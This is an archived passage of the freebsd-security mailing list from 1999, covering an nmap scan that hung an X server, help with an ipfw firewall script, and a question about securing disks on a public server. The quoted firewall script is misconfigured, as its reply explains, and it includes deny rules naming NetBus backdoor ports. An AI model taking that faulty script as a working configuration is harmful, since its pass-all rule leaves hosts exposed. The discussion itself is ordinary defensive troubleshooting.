[195.37.179.254]) by hub.freebsd.org (Postfix) with ESMTP id C757915296 for ; Fri, 5 Nov 1999 10:35:24 -0800 (PST) (envelope-from nox@saturn.kn-bremen.de) Received: from saturn.kn-bremen.de (uucp@localhost) by blaubaer.kn-bremen.de (8.9.1/8.9.1) with UUCP id TAA06815; Fri, 5 Nov 1999 19:31:18 +0100 Received: (from nox@localhost) by saturn.kn-bremen.de (8.9.3/8.8.5) id TAA03533; Fri, 5 Nov 1999 19:32:01 +0100 (MET) From: Juergen Lock Date: Fri, 5 Nov 1999 19:31:57 +0100 To: Bert Kellerman Cc: Giorgos Keramidas , freebsd-security@FreeBSD.ORG Subject: Re: nmap portscan hangs X server? Message-ID: <19991105193157.A2657@saturn.kn-bremen.de> References: <19991104232444.A590@saturn.kn-bremen.de> <199911050231.DAA07673@saturn.kn-bremen.de> <86r9i562jr.fsf@localhost.hell.gr> <38225E5A.B691490E@bellsouth.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.7i In-Reply-To: <38225E5A.B691490E@bellsouth.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Nov 05, 1999 at 04:34:34AM +0000, Bert Kellerman wrote: > I am running nmap 2.3BETA5 and X 3.3.5 on 3.3-STABLE and am not affected by this > problem. Aha, so i guess we can assume it is fixed by now. Thank you for testing... Regard, -- Juergen Lock (remove dot foo from address to reply) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 5 21:39: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 11F7714CC5; Fri, 5 Nov 1999 21:39:03 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id F36021CD620; Fri, 5 Nov 1999 21:39:02 -0800 (PST) (envelope-from kris@hub.freebsd.org) Date: Fri, 5 Nov 1999 21:39:02 -0800 (PST) From: Kris Kennaway To: Juergen Lock Cc: keramida@ceid.upatras.gr, freebsd-security@FreeBSD.ORG Subject: Re: nmap portscan hangs X server? In-Reply-To: <199911050231.DAA07673@saturn.kn-bremen.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 5 Nov 1999, Juergen Lock wrote: > I since found this in the hung server's stdout/stderr log: > > _XSERVTransSocketINETGetPeerAddr: getpeername() failed: 57 > _XSERVTransSocketINETAccept: ...SocketINETGetPeerAddr() failed: > > but why it decides to not process anything anymore from its other > sockets after that i still have no idea. :( DNS resolution timeout? Kris ---- Cthulhu for President! For when you're tired of choosing the _lesser_ of two evils.. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 5 21:52:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from mta1.snfc21.pbi.net (mta1.snfc21.pbi.net [206.13.28.122]) by hub.freebsd.org (Postfix) with ESMTP id A539014BE9 for ; Fri, 5 Nov 1999 21:52:46 -0800 (PST) (envelope-from madscientist@thegrid.net) Received: from remus ([63.193.246.169]) by mta1.snfc21.pbi.net (Sun Internet Mail Server sims.3.5.1999.09.16.21.57.p8) with SMTP id <0FKR001CMHJRNR@mta1.snfc21.pbi.net> for freebsd-security@freebsd.org; Fri, 5 Nov 1999 21:50:15 -0800 (PST) Date: Fri, 05 Nov 1999 21:44:51 -0800 From: The Mad Scientist Subject: Re: FW: rc.firewall X-Sender: i289861@mail.thegrid.net To: freebsd-security@freebsd.org Message-id: <4.1.19991105214436.00969f00@mail.thegrid.net> Message-id: <4.1.19991105214436.00969f00@mail.thegrid.net> MIME-version: 1.0 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Content-type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:44 AM 11/4/99 -0700, you wrote: >hello, i was checking out my firewall, an it seems that it doesn't actually >do anything >=), i've been tring to get it to block FTP lately for example, but when i >ftp in from >a remote host it isn't blocked.. > >Could someOne help me? > >This is my situation: > I am running DHCPclient and as such i don't have a static ip that i could >put into >the rc.firewall, i was told that it would be OK to generalize the whole >thing (ie any to any) but it doesn't apear to be working.. > >#!/bin/sh >fwcmd="/sbin/ipfw -N" >$fwcmd -f flush Remember that rules are examined sequentially. Rule 110 allows everything through. Next, you have to remember that the rules will apply to packets going in either direction if they're left unqualified such as in rule 310. Here's something that should do it: $fwcmd add deny tcp from any to any 21 in via xl0 $fwcmd add deny tcp from any 20 to any out xmit xl0 This denys connections to the ftp server port and an outgoing data connection. If you're not running an ftp server on that machine, the second rule isn't really necessary. Even if you are running an ftp server, it shouldn't be opening rouge data channels to machines that haven't set up the command channel, but you never know. See below for further comments. >$fwcmd add 100 divert natd all from any to any via xl0 >$fwcmd add 110 pass all from any to any >$fwcmd add 120 pass all from any to any via lo0 >$fwcmd add 130 pass tcp from any to any established >$fwcmd add 144 pass all from 10.0.0.0/3 to any > >#accept >$fwcmd add 200 pass tcp from any to any 25 # sendmail >#$fwcmd add 310 pass tcp from any to any 20-21 # ftp >$fwcmd add 320 pass tcp from any to any 22 # ssh >$fwcmd add 315 pass udp from any 53 to any # dns (don't log) >##$fwcmd add 318 pass udp from any 9000 to any # Asherons Call >$fwcmd add 350 pass tcp from any to any 80 # werld wide weeb >$fwcmd add 320 pass tcp from any to any 110 # pop3 > >#deny >$fwcmd add 10000 deny log tcp from any to any 20-21 # block FTP >$fwcmd add 10001 deny log udp from any to any 20-21 # block FTP >$fwcmd add 10160 deny log icmp from any to any #icmp >$fwcmd add 10160 deny log udp from any to any #udp >$fwcmd add 10155 deny log tcp from any to any 2049 #nfs (tcp) >$fwcmd add 10155 deny log tcp from any to any 0-1024 #services >$fwcmd add 10155 deny log tcp from any to any 12300-12350 #netbus >$fwcmd add 10150 deny log tcp from any to any 23 # use ssh not telnet >Please someone help? Why doesn't this apear to work.. > >(the only thing i could do to stop ftp was comment it out in /etc/services) /etc/services is just a database of known servers that run on different ports. I think you're looking for /etc/inetd.conf > >I'm new to ipfw, and wouldn't mind if someone could help and or point me to >resources that would help with this problem > >THanks! >Curtis HTH -Dean To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 6 1:13:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from blaubaer.kn-bremen.de (blaubaer.kn-bremen.de [195.37.179.254]) by hub.freebsd.org (Postfix) with ESMTP id ED81114D28; Sat, 6 Nov 1999 01:13:40 -0800 (PST) (envelope-from nox@saturn.kn-bremen.de) Received: from saturn.kn-bremen.de (uucp@localhost) by blaubaer.kn-bremen.de (8.9.1/8.9.1) with UUCP id KAA01659; Sat, 6 Nov 1999 10:12:23 +0100 Received: (from nox@localhost) by saturn.kn-bremen.de (8.9.3/8.8.5) id JAA31515; Sat, 6 Nov 1999 09:59:11 +0100 (MET) From: Juergen Lock Date: Sat, 6 Nov 1999 09:59:10 +0100 To: Kris Kennaway Cc: keramida@ceid.upatras.gr, freebsd-security@FreeBSD.ORG Subject: Re: nmap portscan hangs X server? Message-ID: <19991106095910.B30755@saturn.kn-bremen.de> References: <199911050231.DAA07673@saturn.kn-bremen.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.7i In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Nov 05, 1999 at 09:39:02PM -0800, Kris Kennaway wrote: > On Fri, 5 Nov 1999, Juergen Lock wrote: > > > I since found this in the hung server's stdout/stderr log: > > > > _XSERVTransSocketINETGetPeerAddr: getpeername() failed: 57 > > _XSERVTransSocketINETAccept: ...SocketINETGetPeerAddr() failed: > > > > but why it decides to not process anything anymore from its other > > sockets after that i still have no idea. :( > > DNS resolution timeout? Don't think so, i have hosts before bind in host.conf (and localhost is in there), and even if it still would try to reach the nameserver it should immediately have gotten a ENETDOWN back, as the dialup link to it was ifconfig'ed down (no flat rates in good ol' germany... :( ) But anyway, as it seems to be fixed in the newer X versions... Regards, -- Juergen Lock (remove dot foo from address to reply) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 6 23:30:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from kuzhmaker.tec2000.org.il (f194.ifirewall.israsrv.net.il [192.117.193.194]) by hub.freebsd.org (Postfix) with ESMTP id 911CB14FC4; Sat, 6 Nov 1999 23:30:51 -0800 (PST) (envelope-from aeg@iname.com) Received: from lair ([192.168.0.226]) by kuzhmaker.tec2000.org.il (8.8.8/8.8.8) with SMTP id JAA04038; Sun, 7 Nov 1999 09:15:07 +0200 (IST) (envelope-from aeg@iname.com) From: "Alexandr Gribenko" To: , "QuestionsBSD" Subject: Encrypted HDD Date: Sun, 7 Nov 1999 09:22:08 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1255" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Has anyone tried/seen something like this on FreeBSD BOX?? I am not paranoic, I am just creating VERY public FreeBSD server, anyone have access to the box itself I used all my ideas like loading splash screen and setting timeout to 1 second ;o) the idea is to disable access to file systems by loading from fixit/other floppy Do not recommend me to remove FDD driver, I did it ;o) I do have a backup ;o) The problem is that it is too public (Da school man ;o) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message